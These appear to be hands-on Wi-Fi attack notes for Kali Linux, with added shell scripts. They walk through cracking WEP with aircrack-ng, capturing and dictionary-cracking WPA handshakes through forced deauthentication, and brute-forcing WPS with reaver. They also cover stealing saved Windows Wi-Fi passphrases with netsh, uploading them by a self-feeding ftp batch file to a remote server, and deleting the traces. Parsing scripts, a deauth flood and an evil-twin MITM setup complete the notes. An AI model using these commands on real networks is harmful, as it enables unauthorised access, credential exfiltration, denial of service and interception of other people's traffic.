- Kali Linux distribution
- external Alfa USB Wi-Fi card (one that supports monitor mode and packet injection) and antenna
airmon-ng
shows the available wireless interfaces
airmon-ng start wlan0
enables monitor mode (the monitor interface is called mon0 on older aircrack-ng versions, wlan0mon on newer ones; the notes below use mon0) and lists all processes that may cause trouble, e.g. dhclient (DHCP client), NetworkManager or wpa_supplicant.
kill 2222
so we just kill those processes by the PID airmon-ng printed (2222 is an example), repeat if there are more. `airmon-ng check kill` does the same in one step.
airodump-ng mon0
now the available APs are shown with some properties (BSSID, channel, ENC/CIPHER, ESSID, and the associated stations below).
copy the BSSID (MAC address) and the channel of the target AP that shows WEP as CIPHER.
airodump-ng -c 10 -w dumpfile --bssid ${mac} mon0
now it is listening only to that AP on its channel (10 in this example) and writes dumpfile-01.cap (plus .csv etc.). Wait for #Data to get high; for WEP you need tens of thousands of IVs.
beware, this is not to be used on foreign networks; the injection below is noisy and can alert a wireless IDS.
aireplay-ng -1 0 -a ${mac} mon0
fake authentication: associates our card with the AP once so the AP accepts our injected frames (add -h <own MAC> if aireplay-ng does not pick up the card's MAC on its own).
aireplay-ng -1 1 -a ${mac} mon0
same, but re-authenticates every second so the association stays alive. Check in the airodump-ng window whether #Data goes up; if it does not, the channel is probably wrong: cancel and restart on the correct one.
aireplay-ng -3 -b ${mac} mon0
ARP request replay: waits for an ARP request from the network and replays it, which makes the AP emit new IVs quickly.
aircrack-ng dumpfile-01.cap
tries to crack the key from the collected IVs; if it fails, let airodump-ng collect more and retry (or try the next .cap file if you restarted the capture).
if it succeeds, the key is printed.
for WPA/WPA2-PSK there is no IV attack: you need to capture the 4-way handshake of a client authenticating to the AP, so you have to force a client to (re)authenticate.
the handshake is then cracked offline by dictionary, so you will need a very good wordlist to find the key.
airmon-ng start wlan0
airodump-ng mon0
copy the BSSID of the desired AP and memorize its channel
new terminal
airodump-ng -c $chan --bssid $mac -w ~/Desktop/dumpfile mon0
dumps the traffic of that AP; here handshakes are needed, not just data. Below the AP you also see the MACs of connected stations, which we need in a moment.
stop other scanning instances if they are still running (they hop channels and interfere with the capture).
aireplay-ng -0 2 -a $ap-mac -c $client-mac mon0
repeat until it runs on the correct channel (aireplay-ng complains if the card is on another channel than the AP).
this deauthenticates the client, which reconnects, and the other instance captures the handshake (airodump-ng then shows "WPA handshake: <bssid>" in its top line).
after collecting a handshake you can start the crack:
aircrack-ng -a 2 -b $ap-mac -w wordlistfile ~/Desktop/*.cap
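Picking the WEP target from the scan and reading the station MACs off the WPA capture are both done by eye above. As an added example (not part of the original notes) the script below does the same from the CSV that `airodump-ng -w dumpfile ...` writes next to the .cap (dumpfile-01.csv): one function lists APs by Privacy column, the other lists the stations associated with a given BSSID. The CSV content is a constructed sample in airodump-ng's column layout; the path and function names are my own.

```sh
#!/bin/sh
# Added example (not from the original notes): pick targets and stations
# from the CSV airodump-ng writes alongside the capture (dumpfile-01.csv).
# The file written below is a constructed sample, not a real capture.
SAMPLE_CSV="${TMPDIR:-/tmp}/airodump-sample-01.csv"
cat > "$SAMPLE_CSV" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2015-01-01 10:00:00, 2015-01-01 10:05:00,  6,  54, WEP , WEP, OPN, -40,  120,   300,   0.  0.  0.  0,   7, labwep ,
66:77:88:99:AA:BB, 2015-01-01 10:00:00, 2015-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,   90,     0,   0.  0.  0.  0,   7, labwpa2,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2015-01-01 10:01:00, 2015-01-01 10:05:00, -50,   42, 66:77:88:99:AA:BB, labwpa2
AA:BB:CC:DD:EE:02, 2015-01-01 10:01:00, 2015-01-01 10:05:00, -70,    3, (not associated) , labwep
EOF

# list_targets CSV PRIVACY -> "bssid channel essid" for every AP whose
# Privacy column starts with PRIVACY (WEP, WPA, WPA2, OPN). "WPA" also
# matches WPA2 networks, which is what you want when hunting handshakes.
list_targets() {
  awk -F', *' -v want="$2" '
    /^Station MAC/ { exit }            # station section starts: done with APs
    /^BSSID/ || NF < 14 { next }       # header or blank line
    { sub(/ +$/, "", $6); sub(/ +$/, "", $14) }   # airodump pads with spaces
    index($6, want) == 1 { printf "%s %s %s\n", $1, $4, $14 }
  ' "$1"
}

# list_clients CSV AP_BSSID -> MACs of stations associated with that AP
# (unassociated stations carry "(not associated)" in the BSSID column)
list_clients() {
  awk -F', *' -v ap="$2" '
    /^Station MAC/ { in_sta = 1; next }
    !in_sta || NF < 6 { next }
    { sub(/ +$/, "", $6) }
    toupper($6) == toupper(ap) { print $1 }
  ' "$1"
}

echo "WEP targets (bssid channel essid):";  list_targets "$SAMPLE_CSV" WEP
echo "WPA/WPA2 targets:";                   list_targets "$SAMPLE_CSV" WPA
echo "stations on 66:77:88:99:AA:BB:";      list_clients "$SAMPLE_CSV" 66:77:88:99:AA:BB
```

On a real run point both functions at the -01.csv of your own capture; the station list is exactly the set of `$client-mac` candidates for the deauth step, and only stations that are actually associated make sense as targets.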
an alternative to wordlists is WPS: reaver brute-forces the WPS PIN and then obtains the WPA passphrase from the AP.
newer APs lock WPS after a number of failed PIN attempts or have it disabled, so this does not work everywhere any more.
in case the Wi-Fi itself is secured properly you might attack a client instead; Windows is a good place to find stored passphrases.
mkdir c:\temp
netsh wlan export profile folder=c:\temp
exports every saved WLAN profile as XML. Add key=clear to get the passphrase in plaintext in <keyMaterial>; without it the key is exported DPAPI-protected (<protected>true</protected>) and cannot be read on another machine.
#netsh wlan add profile filename="theXMLexport.xml"
note that profile changes on Windows are logged in the Event Log (Microsoft-Windows-WLAN-AutoConfig/Operational), so this leaves traces!
this is a batch snippet for copying the exported files to a remote machine via ftp; the batch file feeds itself to ftp as script (-s:"%~f0") and ends with GOTO:EOF, so everything below the first line is only seen by ftp (the :: lines are batch comments that ftp just reports as invalid commands and skips):
::just to copy the file to a remote machine
@ftp -i -s:"%~f0"&GOTO:EOF
open server.net
my_username
my_password
!:---FTP commands following here---
cd location/for/storage
put c:\Temp\*.xml
disconnect
quit
::now delete traces (c:\temp and the exported XML); because of GOTO:EOF this has to happen before the ftp line or in a separate step
on your own Windows machine import the profile and look at it:
netsh
netsh> wlan add profile filename="theXMLexport.xml" user=all
netsh> wlan show profiles
then open the properties of that wireless network (Network and Sharing Center, Wireless Properties, Security tab, "Show characters"): there you can show the key.
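Once the exported XML files are on the attacking machine (the notes move them by ftp), they can be read directly instead of re-importing them. As an added example (not from the original notes) the script below pulls profile name, authentication type and key out of `netsh wlan export profile` XML and flags profiles that were exported without key=clear, whose <keyMaterial> is only a DPAPI blob. Both XML files are constructed samples in the layout of that export; the directory, the placeholder blob and the function names are my own.

```sh
#!/bin/sh
# Added example (not from the original notes): read WLAN profile XML files
# as written by `netsh wlan export profile`, after copying them off the
# Windows box. Both files below are constructed samples, not real exports.
WORK="${TMPDIR:-/tmp}/wlan-profiles"
mkdir -p "$WORK"

# exported with key=clear: the passphrase is in keyMaterial in plaintext
cat > "$WORK/Wi-Fi-labwpa2.xml" <<'EOF'
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>labwpa2</name>
  <SSIDConfig><SSID><hex>6C616277706132</hex><name>labwpa2</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <MSM><security>
    <authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption>
    <sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>CorrectHorseBattery</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>
EOF

# exported without key=clear: keyMaterial is a DPAPI blob (the hex below is a
# placeholder, not a real blob) that only the exporting machine can decrypt
cat > "$WORK/Wi-Fi-labguest.xml" <<'EOF'
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>labguest</name>
  <SSIDConfig><SSID><name>labguest</name></SSID></SSIDConfig>
  <MSM><security>
    <authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption></authEncryption>
    <sharedKey><keyType>passPhrase</keyType><protected>true</protected><keyMaterial>01000000D08C9DDF0115D1118C7A00C04FC297EB0000</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>
EOF

# xml_field FILE TAG -> text of the first <TAG>...</TAG> in FILE (empty if absent).
# Line breaks are removed first so the element may span several lines.
xml_field() {
  tr -d '\n\r\t' < "$1" | awk -v tag="$2" '{
    s = index($0, "<" tag ">"); if (!s) exit
    rest = substr($0, s + length(tag) + 2)
    e = index(rest, "</" tag ">"); print substr(rest, 1, e - 1)
  }'
}

# profile_key FILE -> "name authentication key"; key is PROTECTED when the
# profile was exported without key=clear and "(no key)" for open networks
profile_key() {
  name=$(xml_field "$1" name)
  auth=$(xml_field "$1" authentication)
  key=$(xml_field "$1" keyMaterial)
  if [ "$(xml_field "$1" protected)" = "true" ]; then
    key=PROTECTED     # re-export on the source machine with key=clear
  elif [ -z "$key" ]; then
    key="(no key)"    # no sharedKey element, e.g. an open network
  fi
  echo "$name $auth $key"
}

for f in "$WORK"/*.xml; do profile_key "$f"; done
```

Run it over the directory the ftp step uploaded to; any line ending in PROTECTED means the export has to be repeated on the victim with key=clear, since importing such a profile elsewhere will not give you the passphrase.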
copy the BSSID of the AP and its channel
airodump-ng -c $channel --bssid $ap-mac mon0
now you again see the clients connected to the AP listed below it. This also works in the first (unfiltered) airodump-ng instance using its hotkeys: a switches between the AP/station views, s changes the sort column. Try to find an active client where a DoS actually has a point.
aireplay-ng --deauth 1000 -a $ap-mac -c $client-mac mon0
this causes the client to lose its connection and probably to reconnect manually.
now you can put up a rogue AP with the same ESSID that the client wants to connect to; after that you have the possibility to be MITM of this client's connections as long as they are not end-to-end encrypted.